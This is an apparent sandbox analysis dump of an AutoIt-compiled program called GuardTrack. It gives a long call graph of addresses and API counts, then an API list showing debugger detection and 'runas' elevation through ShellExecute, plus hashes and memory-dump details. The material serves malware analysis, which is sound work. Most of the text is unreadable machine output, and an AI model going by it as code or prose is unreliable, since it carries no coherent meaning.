99390 5c4a2f 84 API calls 99389->99390 99395 5ffb12 99390->99395 99394 5d2f85 _free 58 API calls 99394->99395 99395->99394 99396 5c4a2f 84 API calls 99395->99396 99592 60ff5c 89 API calls 4 library calls 99395->99592 99396->99395 99398 5c1a36 59 API calls 99398->99399 99399->99387 99399->99395 99399->99398 99561 60fef8 99399->99561 99564 61793a 99399->99564 99570 5c343f 99399->99570 99578 5c3297 99399->99578 99591 60fe19 61 API calls 2 library calls 99399->99591 99403 5b1319 99402->99403 99407 5b1338 _memmove 99402->99407 99405 5d0fe6 Mailbox 59 API calls 99403->99405 99404 5d0fe6 Mailbox 59 API calls 99406 5b134f 99404->99406 99405->99407 99406->99367 99407->99404 99408->99360 99593 5c4b29 99409->99593 99414 5c49ed LoadLibraryExW 99603 5c4ade 99414->99603 99415 6008bb 99417 5c4a2f 84 API calls 99415->99417 99419 6008c2 99417->99419 99421 5c4ade 3 API calls 99419->99421 99423 6008ca 99421->99423 99422 5c4a14 99422->99423 99424 5c4a20 99422->99424 99629 5c4ab2 99423->99629 99426 5c4a2f 84 API calls 99424->99426 99428 5c27af 99426->99428 99428->99371 99428->99373 99430 6008f1 99637 5c4a6e 99430->99637 99432 6008fe 99434 5ffd14 99433->99434 99435 5c29e7 99433->99435 100008 60ff5c 89 API calls 4 library calls 99434->100008 99994 5c3df7 60 API calls Mailbox 99435->99994 99438 5c2a09 99995 5c3e47 67 API calls 99438->99995 99439 5ffd27 100009 60ff5c 89 API calls 4 library calls 99439->100009 99441 5c2a1e 99441->99439 99442 5c2a26 99441->99442 99444 5c1207 59 API calls 99442->99444 99446 5c2a32 99444->99446 99445 5ffd43 99474 5c2a93 99445->99474 99996 5d0b8b 60 API calls __ftell_nolock 99446->99996 99448 5c2a3e 99453 5c1207 59 API calls 99448->99453 99449 5ffd56 99451 5c42cf CloseHandle 99449->99451 99450 5c2aa1 99452 5c1207 59 API calls 99450->99452 99454 5ffd62 99451->99454 99455 5c2aaa 99452->99455 99456 5c2a4a 99453->99456 99457 5c49c2 136 API calls 99454->99457 99458 5c1207 59 API calls 99455->99458 99459 5d0284 60 API calls 99456->99459 99460 5ffd7e 99457->99460 99461 5c2ab3 99458->99461 99462 5c2a58 99459->99462 99463 5ffda3 99460->99463 99466 619b16 122 API calls 99460->99466 99999 5d0119 59 API calls Mailbox 99461->99999 99997 5c3ea1 ReadFile SetFilePointerEx 99462->99997 100010 60ff5c 89 API calls 4 library calls 99463->100010 99471 5ffd96 99466->99471 99467 5c2aca 100000 5c17e0 59 API calls Mailbox 99467->100000 99469 5c2a84 99998 5c410a SetFilePointerEx SetFilePointerEx 99469->99998 99475 5ffdbf 99471->99475 99476 5ffd9e 99471->99476 99473 5ffdba 99505 5c2c3e Mailbox 99473->99505 99474->99449 99474->99450 99479 5c4a2f 84 API calls 99475->99479 99478 5c4a2f 84 API calls 99476->99478 99477 5c2adb SetCurrentDirectoryW 99482 5c2aee Mailbox 99477->99482 99478->99463 99480 5ffdc4 99479->99480 99481 5d0fe6 Mailbox 59 API calls 99480->99481 99488 5ffdf8 99481->99488 99484 5d0fe6 Mailbox 59 API calls 99482->99484 99485 5c2b01 99484->99485 99487 5c433f 59 API calls 99485->99487 99486 5c27ef 99486->99161 99486->99186 99515 5c2b0c Mailbox __NMSG_WRITE 99487->99515 99489 5c343f 59 API calls 99488->99489 99523 5ffe41 Mailbox 99489->99523 99490 5c2c19 99491 5c42cf CloseHandle 99490->99491 99494 5c2c25 SetCurrentDirectoryW 99491->99494 99493 600032 99496 61789a 59 API calls 99493->99496 99494->99505 99497 600054 99496->99497 100013 61fc0d 59 API calls 2 library calls 99497->100013 99500 600061 99502 5d2f85 _free 58 API calls 99500->99502 99501 6000cb 100016 60ff5c 89 API calls 4 library calls 99501->100016 99502->99505 99989 5c3e25 99505->99989 99506 6000e4 99506->99490 99507 5c343f 59 API calls 99507->99523 99509 6000c3 100015 60fdb2 59 API calls 4 library calls 99509->100015 99511 5c1a36 59 API calls 99511->99515 99514 60fef8 59 API calls 99514->99523 99515->99490 99515->99501 99515->99509 99515->99511 100001 5c3ebe 67 API calls _wcscpy 99515->100001 100002 5c2e8f GetStringTypeW 99515->100002 100003 5c2dfe 60 API calls __wcsnicmp 99515->100003 100004 5c2edc GetStringTypeW __NMSG_WRITE 99515->100004 100005 5d386d GetStringTypeW _iswctype 99515->100005 100006 5c27fc 165 API calls 3 library calls 99515->100006 100007 5c314d 59 API calls Mailbox 99515->100007 99516 5c1a36 59 API calls 99516->99523 99518 61793a 59 API calls 99518->99523 99519 600084 100014 60ff5c 89 API calls 4 library calls 99519->100014 99522 60009d 99524 5d2f85 _free 58 API calls 99522->99524 99523->99493 99523->99507 99523->99514 99523->99516 99523->99518 99523->99519 100011 60fe19 61 API calls 2 library calls 99523->100011 100012 5c314d 59 API calls Mailbox 99523->100012 99525 6000b0 99524->99525 99525->99505 99527 5c4a8c 85 API calls 99526->99527 99528 619b85 99527->99528 100017 619cf1 99528->100017 99531 5c4ab2 74 API calls 99532 619bb4 99531->99532 99533 5c4ab2 74 API calls 99532->99533 99534 619bc4 99533->99534 99535 5c4ab2 74 API calls 99534->99535 99536 619bdf 99535->99536 99537 5c4ab2 74 API calls 99536->99537 99538 619bfa 99537->99538 99539 5c4a8c 85 API calls 99538->99539 99540 619c11 99539->99540 99541 5d593c __crtCompareStringA_stat 58 API calls 99540->99541 99542 619c18 99541->99542 99543 5d593c __crtCompareStringA_stat 58 API calls 99542->99543 99544 619c22 99543->99544 99545 5c4ab2 74 API calls 99544->99545 99546 619c36 99545->99546 99547 6196c4 GetSystemTimeAsFileTime 99546->99547 99548 619c49 99547->99548 99549 619c73 99548->99549 99550 619c5e 99548->99550 99551 619c79 99549->99551 99552 619cd8 99549->99552 99553 5d2f85 _free 58 API calls 99550->99553 100023 6190c1 99551->100023 99555 5d2f85 _free 58 API calls 99552->99555 99556 619c64 99553->99556 99558 5ff8e7 99555->99558 99559 5d2f85 _free 58 API calls 99556->99559 99558->99376 99558->99377 99559->99558 99560 5d2f85 _free 58 API calls 99560->99558 99562 5d0fe6 Mailbox 59 API calls 99561->99562 99563 60ff28 _memmove 99562->99563 99563->99399 99563->99563 99565 617945 99564->99565 99566 5d0fe6 Mailbox 59 API calls 99565->99566 99567 61795c 99566->99567 99568 61796b 99567->99568 99569 5c1a36 59 API calls 99567->99569 99568->99399 99569->99568 99571 5c34df 99570->99571 99574 5c3452 _memmove 99570->99574 99573 5d0fe6 Mailbox 59 API calls 99571->99573 99572 5d0fe6 Mailbox 59 API calls 99575 5c3459 99572->99575 99573->99574 99574->99572 99576 5d0fe6 Mailbox 59 API calls 99575->99576 99577 5c3482 99575->99577 99576->99577 99577->99399 99579 5c32aa 99578->99579 99581 5c3358 99578->99581 99580 5d0fe6 Mailbox 59 API calls 99579->99580 99583 5c32dc 99579->99583 99580->99583 99581->99399 99582 5d0fe6 59 API calls Mailbox 99582->99583 99583->99581 99583->99582 99585 5c4a39 99584->99585 99587 5c4a40 99584->99587 99586 5d55c6 __fcloseall 83 API calls 99585->99586 99586->99587 99588 5c4a4f 99587->99588 99589 5c4a60 FreeLibrary 99587->99589 99588->99382 99589->99588 99590->99386 99591->99399 99592->99395 99642 5c4b77 99593->99642 99596 5c4b50 99598 5c49d4 99596->99598 99599 5c4b60 FreeLibrary 99596->99599 99597 5c4b77 2 API calls 99597->99596 99600 5d547b 99598->99600 99599->99598 99646 5d5490 99600->99646 99602 5c49e1 99602->99414 99602->99415 99727 5c4baa 99603->99727 99606 5c4b03 99608 5c4a05 99606->99608 99609 5c4b15 FreeLibrary 99606->99609 99607 5c4baa 2 API calls 99607->99606 99610 5c48b0 99608->99610 99609->99608 99611 5d0fe6 Mailbox 59 API calls 99610->99611 99612 5c48c5 99611->99612 99613 5c433f 59 API calls 99612->99613 99614 5c48d1 _memmove 99613->99614 99615 5c490c 99614->99615 99616 60080a 99614->99616 99618 5c4a6e 69 API calls 99615->99618 99617 600817 99616->99617 99736 619ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99616->99736 99737 619f5e 95 API calls 99617->99737 99623 5c4915 99618->99623 99621 5c4ab2 74 API calls 99621->99623 99622 600859 99731 5c4a8c 99622->99731 99623->99621 99623->99622 99626 5c49a0 99623->99626 99627 5c4a8c 85 API calls 99623->99627 99626->99422 99627->99623 99628 5c4ab2 74 API calls 99628->99626 99630 600945 99629->99630 99631 5c4ac4 99629->99631 99843 5d5802 99631->99843 99634 6196c4 99968 61951a 99634->99968 99636 6196da 99636->99430 99638 5c4a7d 99637->99638 99639 600908 99637->99639 99973 5d5e80 99638->99973 99641 5c4a85 99641->99432 99643 5c4b44 99642->99643 99644 5c4b80 LoadLibraryA 99642->99644 99643->99596 99643->99597 99644->99643 99645 5c4b91 GetProcAddress 99644->99645 99645->99643 99647 5d549c _fprintf 99646->99647 99648 5d54af 99647->99648 99651 5d54e0 99647->99651 99695 5d8d58 58 API calls __getptd_noexit 99648->99695 99650 5d54b4 99696 5d8fe6 9 API calls __mbsnbicoll_l 99650->99696 99665 5e0718 99651->99665 99654 5d54e5 99655 5d54ee 99654->99655 99656 5d54fb 99654->99656 99697 5d8d58 58 API calls __getptd_noexit 99655->99697 99657 5d5525 99656->99657 99658 5d5505 99656->99658 99680 5e0837 99657->99680 99698 5d8d58 58 API calls __getptd_noexit 99658->99698 99662 5d54bf @_EH4_CallFilterFunc@8 _fprintf 99662->99602 99666 5e0724 _fprintf 99665->99666 99667 5d9e3b __lock 58 API calls 99666->99667 99678 5e0732 99667->99678 99668 5e07a6 99700 5e082e 99668->99700 99669 5e07ad 99705 5d8a4d 58 API calls 2 library calls 99669->99705 99672 5e07b4 99672->99668 99706 5da05b InitializeCriticalSectionAndSpinCount 99672->99706 99673 5e0823 _fprintf 99673->99654 99675 5d9ec3 __mtinitlocknum 58 API calls 99675->99678 99677 5e07da EnterCriticalSection 99677->99668 99678->99668 99678->99669 99678->99675 99703 5d6e7d 59 API calls __lock 99678->99703 99704 5d6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 99678->99704 99689 5e0857 __wopenfile 99680->99689 99681 5e0871 99711 5d8d58 58 API calls __getptd_noexit 99681->99711 99683 5e0a2c 99683->99681 99687 5e0a8f 99683->99687 99684 5e0876 99712 5d8fe6 9 API calls __mbsnbicoll_l 99684->99712 99686 5d5530 99699 5d5552 LeaveCriticalSection LeaveCriticalSection __wfsopen 99686->99699 99708 5e87d1 99687->99708 99689->99681 99689->99683 99689->99689 99713 5d39fb 60 API calls 2 library calls 99689->99713 99691 5e0a25 99691->99683 99714 5d39fb 60 API calls 2 library calls 99691->99714 99693 5e0a44 99693->99683 99715 5d39fb 60 API calls 2 library calls 99693->99715 99695->99650 99696->99662 99697->99662 99698->99662 99699->99662 99707 5d9fa5 LeaveCriticalSection 99700->99707 99702 5e0835 99702->99673 99703->99678 99704->99678 99705->99672 99706->99677 99707->99702 99716 5e7fb5 99708->99716 99710 5e87ea 99710->99686 99711->99684 99712->99686 99713->99691 99714->99693 99715->99683 99719 5e7fc1 _fprintf 99716->99719 99717 5e7fd7 99718 5d8d58 __mbsnbicoll_l 58 API calls 99717->99718 99720 5e7fdc 99718->99720 99719->99717 99721 5e800d 99719->99721 99722 5d8fe6 __mbsnbicoll_l 9 API calls 99720->99722 99723 5e807e __wsopen_nolock 109 API calls 99721->99723 99726 5e7fe6 _fprintf 99722->99726 99724 5e8029 99723->99724 99725 5e8052 __wsopen_helper LeaveCriticalSection 99724->99725 99725->99726 99726->99710 99728 5c4af7 99727->99728 99729 5c4bb3 LoadLibraryA 99727->99729 99728->99606 99728->99607 99729->99728 99730 5c4bc4 GetProcAddress 99729->99730 99730->99728 99732 600923 99731->99732 99733 5c4a9b 99731->99733 99738 5d5a6d 99733->99738 99735 5c4aa9 99735->99628 99736->99617 99737->99623 99739 5d5a79 _fprintf 99738->99739 99740 5d5a8b 99739->99740 99741 5d5ab1 99739->99741 99769 5d8d58 58 API calls __getptd_noexit 99740->99769 99751 5d6e3e 99741->99751 99744 5d5a90 99770 5d8fe6 9 API calls __mbsnbicoll_l 99744->99770 99750 5d5a9b _fprintf 99750->99735 99752 5d6e4e 99751->99752 99753 5d6e70 EnterCriticalSection 99751->99753 99752->99753 99755 5d6e56 99752->99755 99754 5d5ab7 99753->99754 99757 5d59de 99754->99757 99756 5d9e3b __lock 58 API calls 99755->99756 99756->99754 99758 5d59fc 99757->99758 99759 5d59ec 99757->99759 99761 5d5a12 99758->99761 99772 5d5af0 99758->99772 99842 5d8d58 58 API calls __getptd_noexit 99759->99842 99801 5d4c5d 99761->99801 99766 5d5a53 99814 5e185f 99766->99814 99768 5d59f1 99771 5d5ae8 LeaveCriticalSection LeaveCriticalSection __wfsopen 99768->99771 99769->99744 99770->99750 99771->99750 99773 5d5afd __ftell_nolock 99772->99773 99774 5d5b2d 99773->99774 99775 5d5b15 99773->99775 99777 5d4906 _fprintf 58 API calls 99774->99777 99776 5d8d58 __mbsnbicoll_l 58 API calls 99775->99776 99778 5d5b1a 99776->99778 99779 5d5b35 99777->99779 99780 5d8fe6 __mbsnbicoll_l 9 API calls 99778->99780 99781 5e185f __write 64 API calls 99779->99781 99799 5d5b25 99780->99799 99782 5d5b51 99781->99782 99785 5d5bd4 99782->99785 99786 5d5d41 99782->99786 99782->99799 99783 5dc826 __ftell_nolock 6 API calls 99784 5d5e7c 99783->99784 99784->99761 99788 5d5bfa 99785->99788 99792 5d5cfd 99785->99792 99787 5d5d4a 99786->99787 99786->99792 99789 5d8d58 __mbsnbicoll_l 58 API calls 99787->99789 99790 5e19f5 __lseeki64 62 API calls 99788->99790 99788->99799 99789->99799 99791 5d5c33 99790->99791 99794 5d5c5f ReadFile 99791->99794 99791->99799 99793 5e185f __write 64 API calls 99792->99793 99792->99799 99795 5d5dae 99793->99795 99796 5d5c84 99794->99796 99794->99799 99797 5e185f __write 64 API calls 99795->99797 99795->99799 99798 5e185f __write 64 API calls 99796->99798 99797->99799 99800 5d5c97 99798->99800 99799->99783 99800->99799 99802 5d4c70 99801->99802 99803 5d4c94 99801->99803 99802->99803 99804 5d4906 _fprintf 58 API calls 99802->99804 99807 5d4906 99803->99807 99805 5d4c8d 99804->99805 99806 5ddab6 __write 78 API calls 99805->99806 99806->99803 99808 5d4925 99807->99808 99809 5d4910 99807->99809 99808->99766 99810 5d8d58 __mbsnbicoll_l 58 API calls 99809->99810 99811 5d4915 99810->99811 99812 5d8fe6 __mbsnbicoll_l 9 API calls 99811->99812 99813 5d4920 99812->99813 99813->99766 99815 5e186b _fprintf 99814->99815 99816 5e188f 99815->99816 99817 5e1878 99815->99817 99819 5e192e 99816->99819 99821 5e18a3 99816->99821 99818 5d8d24 __dosmaperr 58 API calls 99817->99818 99820 5e187d 99818->99820 99822 5d8d24 __dosmaperr 58 API calls 99819->99822 99823 5d8d58 __mbsnbicoll_l 58 API calls 99820->99823 99824 5e18cb 99821->99824 99825 5e18c1 99821->99825 99826 5e18c6 99822->99826 99827 5e1884 _fprintf 99823->99827 99829 5dd436 ___lock_fhandle 59 API calls 99824->99829 99828 5d8d24 __dosmaperr 58 API calls 99825->99828 99831 5d8d58 __mbsnbicoll_l 58 API calls 99826->99831 99827->99768 99828->99826 99830 5e18d1 99829->99830 99832 5e18f7 99830->99832 99833 5e18e4 99830->99833 99834 5e193a 99831->99834 99835 5d8d58 __mbsnbicoll_l 58 API calls 99832->99835 99836 5e194e __lseek_nolock 62 API calls 99833->99836 99837 5d8fe6 __mbsnbicoll_l 9 API calls 99834->99837 99839 5e18fc 99835->99839 99838 5e18f0 99836->99838 99837->99827 99841 5e1926 __write LeaveCriticalSection 99838->99841 99840 5d8d24 __dosmaperr 58 API calls 99839->99840 99840->99838 99841->99827 99842->99768 99846 5d581d 99843->99846 99845 5c4ad5 99845->99634 99847 5d5829 _fprintf 99846->99847 99848 5d586c 99847->99848 99849 5d583f _memset 99847->99849 99850 5d5864 _fprintf 99847->99850 99851 5d6e3e __lock_file 59 API calls 99848->99851 99873 5d8d58 58 API calls __getptd_noexit 99849->99873 99850->99845 99853 5d5872 99851->99853 99859 5d563d 99853->99859 99854 5d5859 99874 5d8fe6 9 API calls __mbsnbicoll_l 99854->99874 99860 5d5673 99859->99860 99863 5d5658 _memset 99859->99863 99875 5d58a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 99860->99875 99861 5d5663 99964 5d8d58 58 API calls __getptd_noexit 99861->99964 99863->99860 99863->99861 99866 5d56b3 99863->99866 99866->99860 99867 5d4906 _fprintf 58 API calls 99866->99867 99870 5d57c4 _memset 99866->99870 99876 5e108b 99866->99876 99944 5e0dd7 99866->99944 99966 5e0ef8 58 API calls 3 library calls 99866->99966 99867->99866 99967 5d8d58 58 API calls __getptd_noexit 99870->99967 99872 5d5668 99965 5d8fe6 9 API calls __mbsnbicoll_l 99872->99965 99873->99854 99874->99850 99875->99850 99877 5e10ac 99876->99877 99878 5e10c3 99876->99878 99879 5d8d24 __dosmaperr 58 API calls 99877->99879 99880 5e17fb 99878->99880 99885 5e10fd 99878->99885 99882 5e10b1 99879->99882 99881 5d8d24 __dosmaperr 58 API calls 99880->99881 99883 5e1800 99881->99883 99884 5d8d58 __mbsnbicoll_l 58 API calls 99882->99884 99886 5d8d58 __mbsnbicoll_l 58 API calls 99883->99886 99888 5e10b8 99884->99888 99887 5e1105 99885->99887 99891 5e111c 99885->99891 99895 5e1111 99886->99895 99889 5d8d24 __dosmaperr 58 API calls 99887->99889 99888->99866 99896 5e110a 99889->99896 99890 5d8fe6 __mbsnbicoll_l 9 API calls 99890->99888 99891->99888 99892 5e1131 99891->99892 99897 5e114b 99891->99897 99898 5e1169 99891->99898 99894 5d8d24 __dosmaperr 58 API calls 99892->99894 99893 5d8d58 __mbsnbicoll_l 58 API calls 99893->99895 99894->99896 99895->99890 99896->99893 99897->99892 99902 5e1156 99897->99902 99899 5d8a4d __malloc_crt 58 API calls 99898->99899 99900 5e1179 99899->99900 99903 5e119c 99900->99903 99904 5e1181 99900->99904 99901 5e5e9b __write_nolock 58 API calls 99905 5e126a 99901->99905 99902->99901 99908 5e1af1 __lseeki64_nolock 60 API calls 99903->99908 99906 5d8d58 __mbsnbicoll_l 58 API calls 99904->99906 99907 5e12e3 ReadFile 99905->99907 99912 5e1280 GetConsoleMode 99905->99912 99909 5e1186 99906->99909 99910 5e1305 99907->99910 99911 5e17c3 GetLastError 99907->99911 99908->99902 99913 5d8d24 __dosmaperr 58 API calls 99909->99913 99910->99911 99918 5e12d5 99910->99918 99914 5e12c3 99911->99914 99915 5e17d0 99911->99915 99916 5e1294 99912->99916 99917 5e12e0 99912->99917 99913->99888 99923 5d8d37 __dosmaperr 58 API calls 99914->99923 99927 5e12c9 99914->99927 99919 5d8d58 __mbsnbicoll_l 58 API calls 99915->99919 99916->99917 99920 5e129a ReadConsoleW 99916->99920 99917->99907 99926 5e15a7 99918->99926 99918->99927 99929 5e133a 99918->99929 99921 5e17d5 99919->99921 99920->99918 99922 5e12bd GetLastError 99920->99922 99924 5d8d24 __dosmaperr 58 API calls 99921->99924 99922->99914 99923->99927 99924->99927 99925 5d2f85 _free 58 API calls 99925->99888 99926->99927 99934 5e16ad ReadFile 99926->99934 99927->99888 99927->99925 99930 5e13a6 ReadFile 99929->99930 99935 5e1427 99929->99935 99931 5e13c7 GetLastError 99930->99931 99942 5e13d1 99930->99942 99931->99942 99932 5e14e4 99938 5e1494 MultiByteToWideChar 99932->99938 99939 5e1af1 __lseeki64_nolock 60 API calls 99932->99939 99933 5e14d4 99936 5d8d58 __mbsnbicoll_l 58 API calls 99933->99936 99937 5e16d0 GetLastError 99934->99937 99943 5e16de 99934->99943 99935->99927 99935->99932 99935->99933 99935->99938 99936->99927 99937->99943 99938->99922 99938->99927 99939->99938 99940 5e1af1 __lseeki64_nolock 60 API calls 99940->99942 99941 5e1af1 __lseeki64_nolock 60 API calls 99941->99943 99942->99929 99942->99940 99943->99926 99943->99941 99945 5e0de2 99944->99945 99949 5e0df7 99944->99949 99946 5d8d58 __mbsnbicoll_l 58 API calls 99945->99946 99947 5e0de7 99946->99947 99948 5d8fe6 __mbsnbicoll_l 9 API calls 99947->99948 99957 5e0df2 99948->99957 99950 5e0e2c 99949->99950 99951 5e6214 __getbuf 58 API calls 99949->99951 99949->99957 99952 5d4906 _fprintf 58 API calls 99950->99952 99951->99950 99953 5e0e40 99952->99953 99954 5e0f77 __read 72 API calls 99953->99954 99955 5e0e47 99954->99955 99956 5d4906 _fprintf 58 API calls 99955->99956 99955->99957 99958 5e0e6a 99956->99958 99957->99866 99958->99957 99959 5d4906 _fprintf 58 API calls 99958->99959 99960 5e0e76 99959->99960 99960->99957 99961 5d4906 _fprintf 58 API calls 99960->99961 99962 5e0e83 99961->99962 99963 5d4906 _fprintf 58 API calls 99962->99963 99963->99957 99964->99872 99965->99860 99966->99866 99967->99872 99971 5d542a GetSystemTimeAsFileTime 99968->99971 99970 619529 99970->99636 99972 5d5458 __aulldiv 99971->99972 99972->99970 99974 5d5e8c _fprintf 99973->99974 99975 5d5e9e 99974->99975 99976 5d5eb3 99974->99976 99986 5d8d58 58 API calls __getptd_noexit 99975->99986 99978 5d6e3e __lock_file 59 API calls 99976->99978 99980 5d5eb9 99978->99980 99979 5d5ea3 99987 5d8fe6 9 API calls __mbsnbicoll_l 99979->99987 99982 5d5af0 __ftell_nolock 67 API calls 99980->99982 99983 5d5ec4 99982->99983 99988 5d5ee4 LeaveCriticalSection LeaveCriticalSection __wfsopen 99983->99988 99985 5d5eae _fprintf 99985->99641 99986->99979 99987->99985 99988->99985 99990 5c42cf CloseHandle 99989->99990 99991 5c3e2d Mailbox 99990->99991 99992 5c42cf CloseHandle 99991->99992 99993 5c3e3c 99992->99993 99993->99486 99994->99438 99995->99441 99996->99448 99997->99469 99998->99474 99999->99467 100000->99477 100001->99515 100002->99515 100003->99515 100004->99515 100005->99515 100006->99515 100007->99515 100008->99439 100009->99445 100010->99473 100011->99523 100012->99523 100013->99500 100014->99522 100015->99501 100016->99506 100022 619d05 __tzset_nolock _wcscmp 100017->100022 100018 619b99 100018->99531 100018->99558 100019 5c4ab2 74 API calls 100019->100022 100020 6196c4 GetSystemTimeAsFileTime 100020->100022 100021 5c4a8c 85 API calls 100021->100022 100022->100018 100022->100019 100022->100020 100022->100021 100024 6190da 100023->100024 100025 6190cc 100023->100025 100027 61911f 100024->100027 100028 5d547b 115 API calls 100024->100028 100039 6190e3 100024->100039 100026 5d547b 115 API calls 100025->100026 100026->100024 100054 61934c 74 API calls 3 library calls 100027->100054 100030 619104 100028->100030 100030->100027 100032 61910d 100030->100032 100031 619163 100033 619167 100031->100033 100032->100039 100064 5d55c6 100032->100064 100039->99560 100054->100031 100170 5c2cc7 100169->100170 100175 5c2ddb 100169->100175 100170->100175 100187 5d3465 _fprintf 100186->100187 100188 5d9e3b __lock 51 API calls 100187->100188 100189 5d346c 100188->100189 100190 5d349a DecodePointer 100189->100190 100192 5d3525 _doexit 100189->100192 100190->100192 100193 5d34b1 DecodePointer 100190->100193 100206 5d3573 100192->100206 100199 5d34c1 100193->100199 100195 5d3582 _fprintf 100195->99070 100197 5d34ce EncodePointer 100197->100199 100198 5d356a 100200 5d32cf __mtinitlocknum 3 API calls 100198->100200 100199->100192 100199->100197 100201 5d34de DecodePointer EncodePointer 100199->100201 100202 5d3573 100200->100202 100204 5d34f0 DecodePointer DecodePointer 100201->100204 100203 5d3580 100202->100203 100211 5d9fa5 LeaveCriticalSection 100202->100211 100203->99070 100204->100199 100207 5d3579 100206->100207 100208 5d3553 100206->100208 100212 5d9fa5 LeaveCriticalSection 100207->100212 100208->100195 100210 5d9fa5 LeaveCriticalSection 100208->100210 100210->100198 100211->100203 100212->100208 100213 5c4d83 100214 5c4dba 100213->100214 100215 5c4dd8 100214->100215 100216 5c4e37 100214->100216 100252 5c4e35 100214->100252 100220 5c4ead PostQuitMessage 100215->100220 100221 5c4de5 100215->100221 100218 5c4e3d 100216->100218 100219 6009c2 100216->100219 100217 5c4e1a DefWindowProcW 100255 5c4e28 100217->100255 100225 5c4e65 SetTimer RegisterWindowMessageW 100218->100225 100226 5c4e42 100218->100226 100224 5bc460 10 API calls 100219->100224 100220->100255 100222 600a35 100221->100222 100223 5c4df0 100221->100223 100262 612cce 97 API calls _memset 100222->100262 100227 5c4df8 100223->100227 100228 5c4eb7 100223->100228 100231 6009e9 100224->100231 100229 5c4e8e CreatePopupMenu 100225->100229 100225->100255 100232 600965 100226->100232 100233 5c4e49 KillTimer 100226->100233 100234 5c4e03 100227->100234 100247 600a1a 100227->100247 100260 5c5b29 90 API calls _memset 100228->100260 100229->100255 100236 5bc483 266 API calls 100231->100236 100238 60096a 100232->100238 100239 60099e MoveWindow 100232->100239 100240 5c5ac3 Shell_NotifyIconW 100233->100240 100241 5c4e0e 100234->100241 100242 5c4e9b 100234->100242 100235 600a47 100235->100217 100235->100255 100236->100241 100244 60098d SetFocus 100238->100244 100245 60096e 100238->100245 100239->100255 100246 5c4e5c 100240->100246 100241->100217 100254 5c5ac3 Shell_NotifyIconW 100241->100254 100259 5c5bd7 107 API calls _memset 100242->100259 100243 5c4eab 100243->100255 100244->100255 100245->100241 100249 600977 100245->100249 100258 5b34e4 DeleteObject DestroyWindow Mailbox 100246->100258 100247->100217 100261 608854 59 API calls Mailbox 100247->100261 100253 5bc460 10 API calls 100249->100253 100252->100217 100253->100255 100256 600a0e 100254->100256 100257 5c59d3 94 API calls 100256->100257 100257->100252 100258->100255 100259->100243 100260->100243 100261->100252 100262->100235
                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005C526C
                                                          • IsDebuggerPresent.KERNEL32 ref: 005C527E
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005C52E6
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                            • Part of subcall function 005BBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005BBC07
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 005C5366
                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00600B2E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00600B66
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00666D10), ref: 00600BE9
                                                          • ShellExecuteW.SHELL32(00000000), ref: 00600BF0
                                                            • Part of subcall function 005C514C: GetSysColorBrush.USER32(0000000F), ref: 005C5156
                                                            • Part of subcall function 005C514C: LoadCursorW.USER32(00000000,00007F00), ref: 005C5165
                                                            • Part of subcall function 005C514C: LoadIconW.USER32(00000063), ref: 005C517C
                                                            • Part of subcall function 005C514C: LoadIconW.USER32(000000A4), ref: 005C518E
                                                            • Part of subcall function 005C514C: LoadIconW.USER32(000000A2), ref: 005C51A0
                                                            • Part of subcall function 005C514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005C51C6
                                                            • Part of subcall function 005C514C: RegisterClassExW.USER32(?), ref: 005C521C
                                                            • Part of subcall function 005C50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005C5109
                                                            • Part of subcall function 005C50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005C512A
                                                            • Part of subcall function 005C50DB: ShowWindow.USER32(00000000), ref: 005C513E
                                                            • Part of subcall function 005C50DB: ShowWindow.USER32(00000000), ref: 005C5147
                                                            • Part of subcall function 005C59D3: _memset.LIBCMT ref: 005C59F9
                                                            • Part of subcall function 005C59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005C5A9E
                                                          Strings
                                                          • runas, xrefs: 00600BE4
                                                          • AutoIt, xrefs: 00600B23
                                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00600B28
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                          • API String ID: 529118366-2030392706
                                                          • Opcode ID: d667334926ad22a9e573f9c920a09f18c8dbec733a34a1c4c2e530b7394afb12
                                                          • Instruction ID: 8a039d3bb025e5285d0cac04fc31c9395979f0798eacad7cf275426c7d735b1d
                                                          • Opcode Fuzzy Hash: d667334926ad22a9e573f9c920a09f18c8dbec733a34a1c4c2e530b7394afb12
                                                          • Instruction Fuzzy Hash: C8512530948249AEDB05AFF0DC09FEE7F7ABB86740F10506DF565621A3DEB05A85CB21
                                                          APIs
